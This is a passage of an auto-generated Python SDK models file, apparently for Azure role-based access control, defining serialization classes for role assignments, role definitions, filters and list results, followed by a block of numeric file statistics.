'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'scope': {'key': 'properties.scope', 'type': 'str'},
'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'},
'principal_id': {'key': 'properties.principalId', 'type': 'str'},
'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'},
}
def __init__(
self,
*,
scope: Optional[str] = None,
role_definition_id: Optional[str] = None,
principal_id: Optional[str] = None,
can_delegate: Optional[bool] = None,
**kwargs
):
super(RoleAssignment, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.scope = scope
self.role_definition_id = role_definition_id
self.principal_id = principal_id
self.can_delegate = can_delegate
class RoleAssignmentCreateParameters(msrest.serialization.Model):
"""Role assignment create parameters.
All required parameters must be populated in order to send to Azure.
:param role_definition_id: Required. The role definition ID used in the role assignment.
:type role_definition_id: str
:param principal_id: Required. The principal ID assigned to the role. This maps to the ID
inside the Active Directory. It can point to a user, service principal, or security group.
:type principal_id: str
:param can_delegate: The delegation flag used for creating a role assignment.
:type can_delegate: bool
"""
_validation = {
'role_definition_id': {'required': True},
'principal_id': {'required': True},
}
_attribute_map = {
'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'},
'principal_id': {'key': 'properties.principalId', 'type': 'str'},
'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'},
}
def __init__(
self,
*,
role_definition_id: str,
principal_id: str,
can_delegate: Optional[bool] = None,
**kwargs
):
super(RoleAssignmentCreateParameters, self).__init__(**kwargs)
self.role_definition_id = role_definition_id
self.principal_id = principal_id
self.can_delegate = can_delegate
class RoleAssignmentFilter(msrest.serialization.Model):
"""Role Assignments filter.
:param principal_id: Returns role assignment of the specific principal.
:type principal_id: str
:param can_delegate: The Delegation flag for the role assignment.
:type can_delegate: bool
"""
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'can_delegate': {'key': 'canDelegate', 'type': 'bool'},
}
def __init__(
self,
*,
principal_id: Optional[str] = None,
can_delegate: Optional[bool] = None,
**kwargs
):
super(RoleAssignmentFilter, self).__init__(**kwargs)
self.principal_id = principal_id
self.can_delegate = can_delegate
class RoleAssignmentListResult(msrest.serialization.Model):
"""Role assignment list operation result.
:param value: Role assignment list.
:type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleAssignment]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[RoleAssignment]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["RoleAssignment"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(RoleAssignmentListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class RoleDefinition(msrest.serialization.Model):
"""Role definition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The role definition ID.
:vartype id: str
:ivar name: The role definition name.
:vartype name: str
:ivar type: The role definition type.
:vartype type: str
:param role_name: The role name.
:type role_name: str
:param description: The role definition description.
:type description: str
:param role_type: The role type.
:type role_type: str
:param permissions: Role definition permissions.
:type permissions: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission]
:param assignable_scopes: Role definition assignable scopes.
:type assignable_scopes: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'role_name': {'key': 'properties.roleName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'role_type': {'key': 'properties.type', 'type': 'str'},
'permissions': {'key': 'properties.permissions', 'type': '[Permission]'},
'assignable_scopes': {'key': 'properties.assignableScopes', 'type': '[str]'},
}
def __init__(
self,
*,
role_name: Optional[str] = None,
description: Optional[str] = None,
role_type: Optional[str] = None,
permissions: Optional[List["Permission"]] = None,
assignable_scopes: Optional[List[str]] = None,
**kwargs
):
super(RoleDefinition, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.role_name = role_name
self.description = description
self.role_type = role_type
self.permissions = permissions
self.assignable_scopes = assignable_scopes
class RoleDefinitionFilter(msrest.serialization.Model):
"""Role Definitions filter.
:param role_name: Returns role definition with the specific name.
:type role_name: str
:param type: Returns role definition with the specific type.
:type type: str
"""
_attribute_map = {
'role_name': {'key': 'roleName', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
*,
role_name: Optional[str] = None,
type: Optional[str] = None,
**kwargs
):
super(RoleDefinitionFilter, self).__init__(**kwargs)
self.role_name = role_name
self.type = type
class RoleDefinitionListResult(msrest.serialization.Model):
"""Role definition list operation result.
:param value: Role definition list.
:type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleDefinition]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[RoleDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["RoleDefinition"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(RoleDefinitionListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
| 32.147766
| 165
| 0.615446
| 2,014
| 18,710
| 5.531778
| 0.103774
| 0.028902
| 0.030967
| 0.02585
| 0.533794
| 0.458846
| 0.40903
| 0.390988
| 0.319181
| 0.300332
| 0
| 0.006306
| 0.245697
| 18,710
| 581
| 166
| 32.203098
| 0.783108
| 0.334848
| 0
| 0.591463
| 0
| 0
| 0.182952
| 0.024427
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.009146
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|